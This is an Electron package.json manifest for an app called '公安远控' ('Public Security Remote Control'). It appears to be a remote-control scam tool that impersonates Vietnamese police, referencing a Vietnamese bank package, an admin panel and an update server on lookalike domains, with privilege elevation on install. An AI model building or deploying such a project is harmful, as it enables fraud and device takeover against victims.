{
  "name": "kongzhi",
  "version": "2.4.5",
  "description": "kongzhi",
  "author": "kongzhi",
  "main": "main.js",
  "url": "https://admin.con-gan.shop/julong/auth/login",
  "bao": "com.congan.vietnam.bank",
  "build": {
    "appId": "com.yourcompany.electron-scrcpy",
    "productName": "公安远控",
    "files": [
      "**/*",
      "!node_modules/.cache",
      "!*.log",
      "!build",
      "!*.md",
      "!package-lock.json",
      "!yarn.lock",
      "!jiami"
    ],
    "extraResources": [
      {
        "from": "resources/ziyuan",
        "to": "ziyuan"
      }
    ],
    "directories": {
      "output": "build"
    },
    "win": {
      "target": "nsis",
      "icon": "logo.png"
    },
    "nsis": {
      "oneClick": false,
      "allowToChangeInstallationDirectory": true,
      "createDesktopShortcut": true,
      "createStartMenuShortcut": true,
      "allowElevation": true
    },
    "publish": [
      {
        "provider": "generic",
        "url": "https://dichvucoshk.cyou/down"
      }
    ]
  },
  "scripts": {
    "start": "chcp 65001>nul && electron .",
    "build": "electron-builder"
  },
  "devDependencies": {
    "7zip-bin": "^5.2.0",
    "electron": "^33.3.0",
    "electron-builder": "^25.1.8"
  },
  "dependencies": {
    "axios": "^1.8.3",
    "dotenv": "^16.4.7",
    "electron-updater": "^6.3.9",
    "form-data": "^4.0.2",
    "mathjs": "^14.0.1",
    "sudo-prompt": "^9.2.1"
  }
}
